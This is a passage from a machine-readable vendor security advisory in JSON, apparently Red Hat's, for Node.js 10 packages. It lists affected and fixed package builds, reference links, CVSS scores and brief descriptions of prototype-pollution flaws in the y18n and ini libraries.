"7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7774" }, { "category": "external", "summary": "RHBZ#1898680", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1898680" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7774", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7774" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7774" }, { "category": "external", "summary": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887", "url": "https://snyk.io/vuln/SNYK-JS-Y18N-1021887" } ], "release_date": "2020-10-25T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ], "restart_required": { "category": "none" }, "url": "https://access.redhat.com/errata/RHSA-2021:0521" } ], "scores": [ { "cvss_v3": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "LOW", "baseScore": 7.3, "baseSeverity": "HIGH", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "version": "3.1" }, "products": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] } ], "threats": [ { "category": "impact", "details": "Low" } ], "title": "nodejs-y18n: prototype pollution vulnerability" }, { "cve": "CVE-2020-7788", "cwe": { "id": "CWE-400", "name": "Uncontrolled Resource Consumption" }, "discovery_date": "2020-12-11T00:00:00+00:00", "ids": [ { "system_name": "Red Hat Bugzilla ID", "text": "1907444" } ], "notes": [ { "category": "description", "text": "A flaw was found in nodejs-ini. If an attacker submits a malicious INI file to an application that parses it with ini.parse, they will pollute the prototype on the application. This can be exploited further depending on the context.", "title": "Vulnerability description" }, { "category": "summary", "text": "nodejs-ini: Prototype pollution via malicious INI file", "title": "Vulnerability summary" }, { "category": "other", "text": "Node.JS packages in Red Hat Enterprise Linux and Red Hat Software Collections included the vulnerable dependency packaged in \"nodejs-npm\" component. Processing malicious files using npm could potentially trigger this vulnerability. The \"ini\" package bundled with npm was not in the library path where it could be included directly in other programs.\n\nThe nodejs-nodemon packages in Red Hat Enterprise Linux and Red Hat Software Collections are affected by this vulnerability as they bundle the nodejs-ini library. Usage of that library is governed by nodemon itself, so applications started by nodemon are not impacted. Further, nodemon is a developer tool not intended to be used in production.\n\nThe ini package is included in Red Hat Quay by protractor and webpack-cli, both of which are dev dependencies.", "title": "Statement" }, { "category": "general", "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.", "title": "CVSS score applicability" } ], "product_status": { "fixed": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Workstation-RHSCL-3.6:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Workstation-RHSCL-3.6:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64" ] }, "references": [ { "category": "self", "summary": "Canonical URL", "url": "https://access.redhat.com/security/cve/CVE-2020-7788" }, { "category": "external", "summary": "RHBZ#1907444", "url": "https://bugzilla.redhat.com/show_bug.cgi?id=1907444" }, { "category": "external", "summary": "https://www.cve.org/CVERecord?id=CVE-2020-7788", "url": "https://www.cve.org/CVERecord?id=CVE-2020-7788" }, { "category": "external", "summary": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-7788" } ], "release_date": "2020-12-08T00:00:00+00:00", "remediations": [ { "category": "vendor_fix", "date": "2021-02-15T18:28:29+00:00", "details": "For details on how to apply this update, which includes the changes described in this advisory, refer to:\n\nhttps://access.redhat.com/articles/11258", "product_ids": [ "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.6.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-devel-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-nodejs-docs-0:10.23.1-2.el7.noarch", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.ppc64le", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.s390x", "7Server-RHSCL-3.6-7.7.Z:rh-nodejs10-npm-0:6.14.10-10.23.1.2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.s390x", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.src", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-0:10.23.1-2.el7.x86_64", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.ppc64le", "7Server-RHSCL-3.6:rh-nodejs10-nodejs-debuginfo-0:10.23.1-2.el7.s390x", 